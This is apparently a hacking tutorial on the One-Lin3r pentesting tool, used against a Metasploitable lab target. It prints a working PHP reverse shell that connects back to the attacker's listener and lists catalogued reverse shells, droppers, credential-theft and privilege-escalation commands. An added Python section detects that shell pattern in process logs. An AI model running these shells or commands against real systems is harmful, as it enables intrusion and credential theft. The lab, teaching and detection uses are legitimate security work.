How to Use One-Lin3r to Quickly Generate Reverse Shells, Privesc Commands & More

Dec 25, 2019 03:00 PM
Jun 16, 2020 10:56 PM

A lot of time can be wasted performing trivial tasks over and over again, and it's especially true when it comes to hacking and penetration testing. Trying different shells to own a target, and testing out privilege escalation commands afterward, can eat up a lot of time. Fortunately, there is a tool called One-Lin3r that can quickly generate shells, privesc commands, and more.

One-Lin3r is a Python tool that acts as a framework to automate the generation of one-liners commonly used in pentesting and hacking. Its usage is very similar to Metasploit, so it's natural and simple to pick up for most people. The tool contains features such as auto-complete, search suggestion, automatic copying, and smart searching, making it a breeze to find whatever you're looking for.

In this tutorial, we will be using Metasploitable 2 as the target and Kali Linux as our local machine. You can use a similar setup to follow along. From Step 6 onward, the details will vary based on which one-liner you choose, and we're only showing a few examples here.

Step 1: Install One-Lin3r

The first thing we need to do is install One-Lin3r. It requires Python 3, so the easiest way to do this is with pip3. It will install the tool along with any dependencies it may need. If you don't have pip3, you can install it with:

~# apt install python3-pip

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
  python-pip-whl
The following packages will be upgraded:
  python-pip-whl python3-pip
2 upgraded, 0 newly installed, 0 to remove and 500 not upgraded.
Need to get 2,054 kB of archives.
After this operation, 125 kB disk space will be freed.
Do you want to continue? [Y/n] y
Get:1 http://kali.download/kali kali-rolling/main amd64 python3-pip all 20.0.2-5kali1 [211 kB]
Get:2 http://kali.download/kali kali-rolling/main amd64 python-pip-whl all 20.0.2-5kali1 [1,842 kB]
Fetched 2,054 kB in 1s (2,792 kB/s)
Reading changelogs... Done
(Reading database ... 358625 files and directories currently installed.)
Preparing to unpack .../python3-pip_20.0.2-5kali1_all.deb ...
Unpacking python3-pip (20.0.2-5kali1) over (20.0.2-5) ...
Preparing to unpack .../python-pip-whl_20.0.2-5kali1_all.deb ...
Unpacking python-pip-whl (20.0.2-5kali1) over (20.0.2-5) ...
Setting up python-pip-whl (20.0.2-5kali1) ...
Setting up python3-pip (20.0.2-5kali1) ...
Processing triggers for man-db (2.9.1-1) ...
Processing triggers for kali-menu (2020.2.2) ...

Then, to install One-Lin3r, use:

~# pip3 install one-lin3r

Collecting one-lin3r
  Downloading one-lin3r-2.1.tar.gz (530 kB)
     |████████████████████████████████| 530 kB 1.1 MB/s
Requirement already satisfied: prompt_toolkit in /usr/lib/python3/dist-packages (from one-lin3r) (3.0.5)
Requirement already satisfied: pyperclip in /usr/lib/python3/dist-packages (from one-lin3r) (1.8.0)
Collecting terminaltables
  Downloading terminaltables-3.1.0.tar.gz (12 kB)
Building wheels for collected packages: one-lin3r, terminaltables
  Building wheel for one-lin3r (setup.py) ... done
  Created wheel for one-lin3r: filename=one_lin3r-2.1-py3-none-any.whl size=98517 sha256=4a8b3602329c770cb1c5a0af6fce25068e1c6ca9298c0b1dbee469856f67f403
  Stored in directory: /home/kali/.cache/pip/wheels/77/05/5a/6cfde98092f3a965cbc9b34ceacdaa306f7860238ace2b507e
  Building wheel for terminaltables (setup.py) ... done
  Created wheel for terminaltables: filename=terminaltables-3.1.0-py3-none-any.whl size=15354 sha256=d27bd634201dfb06449264a7bf3eea578bdff2b786b6923bb44ee9f9e8908d7f
  Stored in directory: /home/kali/.cache/pip/wheels/08/8f/5f/253d0105a55bd84ee61ef0d37dbf70421e61e0cd70cef7c5e1
Successfully built one-lin3r terminaltables
Installing collected packages: terminaltables, one-lin3r
Successfully installed one-lin3r-2.1 terminaltables-3.1.0

If you get a warning that one-lin3r is installed in a directory that's not on PATH, open your ~/.bashrc file in a text editor like nano or vim, add "export PATH=$PATH:/" followed by the path of the script at the end of the file, and save it.

Step 2: Get to Know Its Basic Usage

Now, we can run the basic help menu by tacking on the -h flag:

~# one-lin3r -h

usage: One-Lin3r.py [-h] [-r R] [-x X] [-q]

optional arguments:
  -h, --help  show this help message and exit
  -r R        Execute a resource file.
  -x X        Execute a specific command (use ; for multiples).
  -q          Quiet mode (no banner).

One-Lin3r is a framework, so to really get into it, we need to start it up. Simply type one-lin3r in the terminal to do so:

~# one-lin3r

               zeeeeee-
              z$$$$$$"
             d$$$$$$"
            d$$$$$P
           d$$$$$P
          $$$$$$"
        .$$$$$$"
       .$$$$$$"
      4$$$$$$$$$$$$$"
     z$$$$$$$$$$$$$"
     """""""3$$$$$"
           z$$$$P
          d$$$$"        One-Lin3r By D4Vinci - V2.1
        .$$$$$"           A framework where all your liners belongs to...
       z$$$$$"              Loaded 176 liner(s).
      z$$$$P
     d$$$$$$$$$$"
    *******$$$"
         .$$$"
        .$$"
       4$P"
      z$"
     zP
    z"
   /
  ^

OneLiner >

Once it starts, we're greeted with a banner, much like what happens when starting the Metasploit Framework. In fact, most of the commands and usage of this tool are very similar to Metasploit, so most of us should feel right at home.

Typing help or ? will give us the detailed help menu:

OneLiner > ?

    Command                 Description
    --------                -------------
    help/?                  Show this help menu.
    list/show               List all one-liners in the database.
    search   [Keywords..]   Search database for a specific liner by its name, author name or description.
    use       <liner>       Use an available one-liner.
    copy      <liner>       Use an available one-liner and copy it to clipboard automatically.
    info      <liner>       Get information about an available liner.
    set <variable> <value>  Sets a context-specific variable to a value to use while using one-liners.
    variables               Prints all previously specified variables.
    banner                  Display banner.
    reload/refresh          Reload the liners database.
    check                   Prints the core version and checks if you are up-to-date.
    history                 Display command-line most important history from the beginning.
    makerc                  Save command-line history to a file.
    resource    <file>      Run the commands stored in a file
    os         <command>    Execute a system command without closing the framework
    exit/quit               Exit the framework

Since we are restricted to the framework prompt while running One-Lin3r, it's useful to be able to run operating system commands while working. Use the os keyword followed by whatever command you wish to run to do this. For example:

OneLiner > os uname -a

Linux kali 5.5.0-kali2-amd64 #1 SMP Debian 5.5.17-1kali1 (2020-04-21) x86_64 GNU/Linux

Step 3: List the One-Liners

We can use the list command to display all of the available one-liners the tool has to offer. It will list the names and associated functions of each one. As of June 16, 2020, there are 176 one-liners available.

OneLiner > list

 #   | Name                                                        | Function
-----+-------------------------------------------------------------+--------------------
 1   | linux/awk/reverse_udp                                       | Reverse Shell
 2   | linux/awk/bind_tcp                                          | Bind Shell
 3   | linux/awk/reverse_tcp                                       | Reverse Shell
 4   | linux/ncat/reverse_udp                                      | Reverse Shell
 5   | linux/ncat/reverse_tcp_ssl                                  | Reverse Shell
 6   | linux/ncat/reverse_tcp                                      | Reverse Shell
 7   | linux/openssl/reverse_tcp                                   | Reverse Shell
 8   | linux/nodejs/reverse_tcp                                    | Reverse Shell
 9   | linux/nc/reverse_udp                                        | Reverse Shell
 10  | linux/nc/reverse_tcp_mknod                                  | Reverse Shell
 11  | linux/nc/bind_tcp                                           | Bind Shell
 12  | linux/nc/reverse_tcp_mkfifo                                 | Reverse Shell
 13  | linux/nc/bind_tcp_mkfifo                                    | Bind Shell
 14  | linux/nc/reverse_tcp                                        | Reverse Shell
 15  | linux/go/reverse_tcp                                        | Reverse Shell
 16  | linux/java/reverse_tcp                                      | Reverse Shell
 17  | linux/perl/bind_udp                                         | Bind Shell
 18  | linux/perl/reverse_udp_miosocket                            | Reverse Shell
 19  | linux/perl/bind_tcp                                         | Bind Shell
 20  | linux/perl/reverse_tcp_miosocket                            | Reverse Shell
 21  | linux/perl/reverse_tcp                                      | Reverse Shell
 22  | linux/python/reverse_udp                                    | Reverse Shell
 23  | linux/python/bind_udp                                       | Bind Shell
 24  | linux/python/http_server                                    | Dropper
 25  | linux/python/bind_tcp                                       | Bind Shell
 26  | linux/python/reverse_tcp_interactive                        | Reverse Shell
 27  | linux/python/reverse_tcp                                    | Reverse Shell
 28  | linux/php/bind_udp                                          | Bind Shell
 29  | linux/php/bind_tcp                                          | Bind Shell
 30  | linux/php/reverse_tcp                                       | Reverse Shell
 31  | linux/telnet/reverse_tcp_mknod                              | Reverse Shell
 32  | linux/telnet/reverse_tcp_mkfifo                             | Reverse Shell
 33  | linux/lua/reverse_tcp_bash                                  | Reverse Shell
 34  | linux/lua/reverse_tcp                                       | Reverse Shell
 35  | linux/ruby/bind_udp                                         | Bind Shell
 36  | linux/ruby/bind_tcp                                         | Bind Shell
 37  | linux/ruby/reverse_tcp                                      | Reverse Shell
 38  | linux/socat/bind_udp                                        | Bind Shell
 39  | linux/socat/reverse_tcp                                     | Reverse Shell
 40  | linux/bash/list_cronjobs_for_current_user                   | PrivEsc
 41  | linux/bash/get_bash_history_for_all_user                    | PrivEsc
 42  | linux/bash/search_for_writeable_folders_files               | PrivEsc
 43  | linux/bash/search_for_password_using_grep                   | PrivEsc
 44  | linux/bash/find_suid                                        | PrivEsc
 45  | linux/bash/get_ssh_private_keys_for_all_users               | PrivEsc
 46  | linux/bash/get_apache_site_enabled                          | PrivEsc
 47  | linux/bash/get_aws_security_credentials                     | PrivEsc
 48  | linux/bash/search_for_password_using_find                   | PrivEsc
 49  | linux/bash/list_systemd_timers                              | PrivEsc
 50  | linux/bash/reverse_tcp_exec                                 | Reverse Shell
 51  | linux/bash/search_for_password_in_memory                    | PrivEsc
 52  | linux/bash/exploit_writeable_sudoers                        | PrivEsc
 53  | linux/bash/get_last_edited_files                            | PrivEsc
 54  | linux/bash/list_all_capabilities                            | PrivEsc
 55  | linux/bash/reverse_tcp                                      | Reverse Shell
 56  | linux/bash/list_cronjobs_for_all_users                      | PrivEsc
 57  | linux/bash/exploit_docker_bash_container                    | PrivEsc
 58  | linux/bash/list_cronjobs_for_another_user                   | PrivEsc
 59  | linux/tclsh/reverse_tcp                                     | Reverse Shell
 60  | multi/msfvenom/linux_elf_reverse_meterpreter                | Msfvenom Generator
 61  | multi/msfvenom/java_jsp_reverse_shell                       | Msfvenom Generator
 62  | multi/msfvenom/windows_asp_reverse_meterpreter              | Msfvenom Generator
 63  | multi/msfvenom/unix_perl_reverse_shell                      | Msfvenom Generator
 64  | multi/msfvenom/php_reverse_meterpreter                      | Msfvenom Generator
 65  | multi/msfvenom/unix_python_reverse_shell                    | Msfvenom Generator
 66  | multi/msfvenom/unix_bash_reverse_shell                      | Msfvenom Generator
 67  | multi/msfvenom/windows_exe_reverse_meterpreter              | Msfvenom Generator
 68  | multi/msfvenom/java_war_reverse_shell                       | Msfvenom Generator
 69  | multi/msfvenom/osx_macho_reverse_shell                      | Msfvenom Generator
 70  | multi/nmap/ftp_bruteforce                                   | Nmap script
 71  | multi/nmap/http_enumerate                                   | Nmap script
 72  | multi/nmap/full_vulnerability_scan                          | Nmap script
 73  | multi/nmap/google_malware_check                             | Nmap script
 74  | multi/nmap/common_malware_scan                              | Nmap script
 75  | multi/nmap/slowloris_attack                                 | Nmap script
 76  | windows/cmd/dll_dropper_rundll32                            | Dropper
 77  | windows/cmd/win_remote_management                           | Execute
 78  | windows/cmd/search_for_passwords                            | PrivEsc
 79  | windows/cmd/exe_dropper_bitsadmin                           | Dropper
 80  | windows/cmd/read_registry_winlogon_key                      | PrivEsc
 81  | windows/cmd/list_scheduled_tasks                            | PrivEsc
 82  | windows/cmd/exe_dropper_certutil                            | Dropper
 83  | windows/cmd/read_registry_runonce_key                       | PrivEsc
 84  | windows/cmd/list_arp_tables                                 | PrivEsc
 85  | windows/cmd/runas_with_creds                                | Execute
 86  | windows/cmd/list_processes_running_as_system                | PrivEsc
 87  | windows/cmd/read_registry_always_install_elevated_key_lm    | PrivEsc
 88  | windows/cmd/list_localgroups                                | PrivEsc
 89  | windows/cmd/hta_dropper_mshta                               | Dropper
 90  | windows/cmd/list_startup_folder_currentuser                 | PrivEsc
 91  | windows/cmd/read_registry_always_install_elevated_key_cu    | PrivEsc
 92  | windows/cmd/read_firewall_config                            | PrivEsc
 93  | windows/cmd/list_logon_requirements                         | PrivEsc
 94  | windows/cmd/get_systeminfo                                  | PrivEsc
 95  | windows/cmd/list_routing_tables                             | PrivEsc
 96  | windows/cmd/read_registry_putty_sessions                    | PrivEsc
 97  | windows/cmd/search_registry_for_passwords_lm                | PrivEsc
 98  | windows/cmd/list_startup_folder_allusers                    | PrivEsc
 99  | windows/cmd/read_registry_vnc_passwords                     | PrivEsc
 100 | windows/cmd/xsl_dropper_wmic                                | Dropper
 101 | windows/cmd/list_network_shares                             | PrivEsc
 102 | windows/cmd/sct_dropper_rundll32                            | Dropper
 103 | windows/cmd/search_registry_for_passwords_cu                | PrivEsc
 104 | windows/cmd/msi_quiet_installer                             | Execute
 105 | windows/cmd/get_saved_wifi_passwords                        | PrivEsc
 106 | windows/cmd/sct_dropper_regsvr32                            | Dropper
 107 | windows/cmd/bat_dropper                                     | Dropper
 108 | windows/cmd/list_installed_updates                          | PrivEsc
 109 | windows/cmd/list_users                                      | PrivEsc
 110 | windows/cmd/list_running_processes                          | PrivEsc
 111 | windows/cmd/dll_dropper_regasm                              | Dropper
 112 | windows/cmd/execute_over_forfiles                           | Execute
 113 | windows/cmd/list_user_privileges                            | PrivEsc
 114 | windows/cmd/read_services_with_wmic                         | PrivEsc
 115 | windows/cmd/get_snmp_config                                 | PrivEsc
 116 | windows/cmd/sct_dropper_mshta                               | Dropper
 117 | windows/cmd/get_architecture                                | PrivEsc
 118 | windows/cmd/read_services_with_tasklist                     | PrivEsc
 119 | windows/cmd/read_registry_snmp_key                          | PrivEsc
 120 | windows/cmd/list_current_connections                        | PrivEsc
 121 | windows/cmd/dll_dropper_certutil_base64                     | Dropper
 122 | windows/cmd/read_registry_run_key                           | PrivEsc
 123 | windows/cmd/list_unqouted_services                          | PrivEsc
 124 | windows/cmd/execute_c#_files                                | Execute
 125 | windows/cmd/list_drives                                     | PrivEsc
 126 | windows/cmd/disable_firewall_netsh                          | PrivEsc
 127 | windows/cmd/list_network_interfaces                         | PrivEsc
 128 | windows/cmd/msi_dropper_wininstaller                        | Dropper
 129 | windows/cmd/dll_loader_control_panel                        | Loader
 130 | windows/cmd/read_registry_r_key                             | PrivEsc
 131 | windows/cmd/list_startup_tasks_with_wmic                    | PrivEsc
 132 | windows/cmd/dll_loader_word                                 | Loader
 133 | windows/cmd/get_saved_wifi_aps_ssid                         | PrivEsc
 134 | windows/scan/check_netapi                                   | Nmap script
 135 | windows/scan/check_eternal_blue                             | Nmap script
 136 | windows/wsl/runas_with_creds                                | Execute
 137 | windows/nc/bind_tcp                                         | Bind Shell
 138 | windows/nc/reverse_tcp                                      | Reverse Shell
 139 | windows/perl/bind_udp                                       | Bind Shell
 140 | windows/perl/bind_tcp                                       | Bind Shell
 141 | windows/perl/reverse_tcp                                    | Reverse Shell
 142 | windows/groovysh/reverse_tcp                                | Reverse Shell
 143 | windows/python/bind_udp                                     | Bind Shell
 144 | windows/python/bind_tcp                                     | Bind Shell
 145 | windows/python/reverse_tcp_threaded                         | Reverse Shell
 146 | windows/python/reverse_tcp                                  | Reverse Shell
 147 | windows/php/bind_udp                                        | Bind Shell
 148 | windows/php/bind_tcp                                        | Bind Shell
 149 | windows/lua/reverse_tcp                                     | Reverse Shell
 150 | windows/ruby/bind_udp                                       | Bind Shell
 151 | windows/ruby/bind_tcp                                       | Bind Shell
 152 | windows/ruby/reverse_tcp                                    | Reverse Shell
 153 | windows/powershell/list_installed_programs_using_folders    | PrivEsc
 154 | windows/powershell/list_scheduled_tasks                     | PrivEsc
 155 | windows/powershell/list_arp_tables                          | PrivEsc
 156 | windows/powershell/get_iis_config                           | PrivEsc
 157 | windows/powershell/ps1_dropper                              | Dropper
 158 | windows/powershell/setup_powerup_powertools                 | PrivEsc
 159 | windows/powershell/reverse_tcp_string                       | Reverse Shell
 160 | windows/powershell/list_routing_tables                      | PrivEsc
 161 | windows/powershell/bind_tcp                                 | Bind Shell
 162 | windows/powershell/get_saved_wifi_passwords                 | PrivEsc
 163 | windows/powershell/list_installed_programs_using_registry   | PrivEsc
 164 | windows/powershell/list_running_processes                   | PrivEsc
 165 | windows/powershell/meterpreter_shell                        | Reverse Shell
 166 | windows/powershell/setup_session_gopher                     | PrivEsc
 167 | windows/powershell/list_unqouted_services                   | PrivEsc
 168 | windows/powershell/setup_keylogger_powersploit              | Keylogger
 169 | windows/powershell/get_passwords_from_memory_using_mimikatz | PrivEsc
 170 | windows/powershell/ps1_dropper_rundll32                     | Dropper
 171 | windows/powershell/reverse_tcp                              | Reverse Shell
 172 | windows/powershell/list_network_interfaces                  | PrivEsc
 173 | windows/powershell/ps1_dropper_microsoft_syncappv           | Dropper
 174 | openbsd/nc/bind_udp                                         | Bind Shell
 175 | openbsd/nc/reverse_tcp                                      | Reverse Shell
 176 | openbsd/bash/read_doas_config                               | PrivEsc

Step 4: Search for a One-Liner

We can also search for specific items using the search command. This is something that One-Lin3r is really good at. It not only has auto-complete capabilities, but it also knows what you are trying to search for by offering suggestions and allowing partial search terms.

For instance, let's say we wanted some kind of PHP shell for Linux. We don't need to type the full path for the tool to find what we are looking for.

OneLiner > search linux php

 #   | Name                  | Function
-----+-----------------------+---------------
 1   | linux/php/bind_udp    | Bind Shell
 2   | linux/php/bind_tcp    | Bind Shell
 3   | linux/php/reverse_tcp | Reverse Shell

Step 5: Get More Info About a One-Liner

We can get information about a specific one-liner with the info command, which will give us a short description of the item, including its author, function, and variables that are used.

OneLiner > info linux/php/reverse_tcp

[+] Liner added by => vesche
[+] Function       => Reverse Shell
[+] Variables used => TARGET, PORT
[+] Description    => Uses PHP sockets & exec to create a reverse shell.

Step 6: Load Any One-Liner

Once we've found a suitable item, we can load it with the use command. I'm using a reverse shell as an example. Once we do so, it will give us the actual line that we need to copy and run.

OneLiner > use linux/php/reverse_tcp

[+] Your liner is: php -r '$sock=fsockopen("TARGET",PORT);exec("/bin/sh -i <&3 >&3 2>&3");'

Step 7: List & Set Variables

In this example, we can see there are parameters for the target and port. To display current variables and their associated values, simply type variables at the prompt:

OneLiner > variables

 # | Name      | Value
---+-----------+-------
 1 | TARGET    | None
 2 | PORT      | None
 3 | URL       | None
 4 | COMMAND   | None
 5 | FILE_PATH | None
 6 | USERNAME  | None
 7 | PASSWORD  | None

Now we are able to set values for these variables, much like how we do in Metasploit. Since we are generating a reverse shell here, we need to set the target to the IP address of our local machine:

OneLiner > set target 10.10.0.1

[+] Variable target set to 10.10.0.1

And the desired port so it can connect back to our listener:

OneLiner > set port 4321

[+] Variable port set to 4321

Now when we display the variables again, we can see that our values are set:

OneLiner > variables

 # | Name      | Value
---+-----------+-----------
 1 | TARGET    | 10.10.0.1
 2 | PORT      | 4321
 3 | URL       | None
 4 | COMMAND   | None
 5 | FILE_PATH | None
 6 | USERNAME  | None
 7 | PASSWORD  | None

Step 8: Use the Chosen One-Liner

Let's try this out. First, we need to set up a listener so we can catch the incoming connection from the target. Netcat is always a good choice, which we'd use in a new terminal window:

~# nc -lvp 4321

listening on [any] 4321 ...

Next, back in the One-Lin3r terminal window, load the one-liner to get the full command. We can see that the target and port variables are now filled in with our values:

OneLiner > use linux/php/reverse_tcp

[+] Your liner is: php -r '$sock=fsockopen("10.10.0.1",4321);exec("/bin/sh -i <&3 >&3 2>&3");'

We could just copy this command like normal, but One-Lin3r actually has a feature to automate this for us. Instead of loading an item with the use command, load it with the copy command — this will automatically copy what we need right to the clipboard:

OneLiner > copy linux/php/reverse_tcp

[+] Your liner is: php -r '$sock=fsockopen("10.10.0.1",4321);exec("/bin/sh -i <&3 >&3 2>&3");'
[+] Liner copied to clipboard successfully!

From here, it's time to exploit the target. Feel free to do this however you want, but command injection is always a favorite of mine. Once we exploit the target and run our reverse shell command, we should see a connection open up on our local machine:

10.10.0.50: inverse host lookup failed: Unknown host
connect to [10.10.0.1] from (UNKNOWN) [10.10.0.50] 56718
sh: no job control in this shell
sh-3.2$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

We can now run commands like id to verify we have compromised a user on the system.
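
From the defender's side, the liner above leaves a recognizable process record: an interpreter started with an inline-code flag whose code both opens a socket and calls a shell. The following is an added example, not part of One-Lin3r or the original article, that checks constructed process-execution records for that shape and for a web service account starting an interactive shell. The record format, account list, and rule names are assumptions, and the check goes beyond the PHP case to other interpreters' inline-code flags.

```python
import os
import re
import shlex

# Constructed process-execution records, "user|parent|command line".
# The first command line is the liner printed in Step 8; the others are
# made-up benign and suspicious neighbours for comparison.
SAMPLE_EVENTS = r"""
www-data|apache2|php -r '$sock=fsockopen("10.10.0.1",4321);exec("/bin/sh -i <&3 >&3 2>&3");'
www-data|apache2|php /var/www/dvwa/index.php
deploy|bash|php -r 'echo json_encode(["ok" => true]);'
www-data|php|/bin/sh -i
root|cron|php -r '$s=fsockopen("127.0.0.1",25);fwrite($s,"QUIT\r\n");'
www-data|sh|id
""".strip().splitlines()

# Interpreter -> flag that takes inline code (assumed watch list).
INLINE_FLAGS = {"php": "-r", "python": "-c", "python3": "-c",
                "perl": "-e", "ruby": "-e"}
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx"}  # assumed local policy
SHELLS = {"sh", "bash", "dash"}

NET_PRIMITIVE = re.compile(r"fsockopen|socket", re.I)
SHELL_CALL = re.compile(r"""(?:^|[\s"'/])(?:sh|bash|dash)\b""")
FD_REDIRECT = re.compile(r"[<>]&\s*\d")


def parse_event(line):
    """Split one record into (user, parent, argv); None if malformed."""
    parts = line.split("|", 2)
    if len(parts) != 3:
        return None
    user, parent, cmdline = parts
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        # Unbalanced quotes (truncated log field): fall back to whitespace.
        argv = cmdline.split()
    return user, parent, argv


def inline_code(argv):
    """Return the code string passed to an interpreter's inline flag."""
    flag = INLINE_FLAGS.get(os.path.basename(argv[0]))
    if flag and flag in argv[1:]:
        idx = argv.index(flag, 1)
        if idx + 1 < len(argv):
            return argv[idx + 1]
    return None


def classify(line):
    """Return (rule, severity) for a suspicious record, else None."""
    event = parse_event(line)
    if event is None or not event[2]:
        return None
    user, _parent, argv = event

    code = inline_code(argv)
    # A socket call alone is normal (mail checks, health probes); the
    # signal is a socket call and a shell call in the same inline code.
    if code and NET_PRIMITIVE.search(code) and SHELL_CALL.search(code):
        severity = "high" if FD_REDIRECT.search(code) else "medium"
        return "inline-socket-shell", severity

    # A web service account has no reason to start an interactive shell.
    if (user in SERVICE_ACCOUNTS
            and os.path.basename(argv[0]) in SHELLS
            and "-i" in argv[1:]):
        return "service-account-interactive-shell", "medium"
    return None


def detect(lines):
    """Return [(line_index, rule, severity)] for every flagged record."""
    findings = []
    for index, line in enumerate(lines):
        result = classify(line)
        if result:
            findings.append((index,) + result)
    return findings


if __name__ == "__main__":
    for index, rule, severity in detect(SAMPLE_EVENTS):
        print(f"[{severity}] {rule}: {SAMPLE_EVENTS[index]}")
```

The last sample record (www-data running id) is not flagged, which shows the limit of command-line matching: once a shell exists, follow-on commands look ordinary, so the spawn event is the one to alert on.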

Step 9: Perform Privilege Escalation

Now that we have a shell on the system as a limited user, the next step to take would be privilege escalation. Fortunately, One-Lin3r also contains some handy privesc commands for us to generate.

First things first, let's upgrade this shell we have to a fully interactive TTY session so we have more control over what we're doing.

Now that we have a decent shell, let's find a potential privesc command to use. I usually like to work out of a world-writable directory during post-exploitation so I can write and execute whatever I want — /var/tmp is a good bet:

www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$ cd /var/tmp

Now, back in One-Lin3r, we can search for an appropriate privesc for Linux:

OneLiner > search linux privesc

 #   | Name                                          | Function
-----+-----------------------------------------------+----------
 1   | linux/bash/list_cronjobs_for_current_user     | PrivEsc
 2   | linux/bash/get_bash_history_for_all_user      | PrivEsc
 3   | linux/bash/search_for_writeable_folders_files | PrivEsc
 4   | linux/bash/search_for_password_using_grep     | PrivEsc
 5   | linux/bash/find_suid                          | PrivEsc
 6   | linux/bash/get_ssh_private_keys_for_all_users | PrivEsc
 7   | linux/bash/get_apache_site_enabled            | PrivEsc
 8   | linux/bash/get_aws_security_credentials       | PrivEsc
 9   | linux/bash/search_for_password_using_find     | PrivEsc
 10  | linux/bash/list_systemd_timers                | PrivEsc
 11  | linux/bash/search_for_password_in_memory      | PrivEsc
 12  | linux/bash/exploit_writeable_sudoers          | PrivEsc
 13  | linux/bash/get_last_edited_files              | PrivEsc
 14  | linux/bash/list_all_capabilities              | PrivEsc
 15  | linux/bash/list_cronjobs_for_all_users        | PrivEsc
 16  | linux/bash/exploit_docker_bash_container      | PrivEsc
 17  | linux/bash/list_cronjobs_for_another_user     | PrivEsc

Let's take a look at this one, which will list any cron jobs for the current user:

OneLiner > info linux/bash/list_cronjobs_for_current_user

[+] Liner added by => Karim shoair (D4Vinci)
[+] Function       => PrivEsc
[+] Variables used => None
[+] Description    => List all crob jobs for current user

Seems pretty straightforward, and we don't even need to set any variables. Use the copy command to copy it straight to the clipboard:

OneLiner > copy linux/bash/list_cronjobs_for_current_user

[+] Your liner is: crontab -l
[+] Liner copied to clipboard successfully!

We can see it still tells us what it generates, but we save an extra step by copying the command automatically. The only thing left to do is run the one-liner on the target:

www-data@metasploitable:/var/tmp$ crontab -l

no crontab for www-data

We can see in this particular instance there are no cron jobs for this user, but One-Lin3r makes it easy to have some common privesc commands right at our fingertips.

Wrapping Up

Today, we explored a tool called One-Lin3r and how to use it to quickly generate shells, privilege escalation commands, and more. We tested it out by using a PHP reverse shell to compromise the target, then tried to escalate privileges by generating a command to check for cron jobs. With an interface that feels familiar to any Metasploit user, One-Lin3r makes it easy to hack on the fly.

Cover image by EVG photos/Pexels; Screenshots by drd_/Null Byte
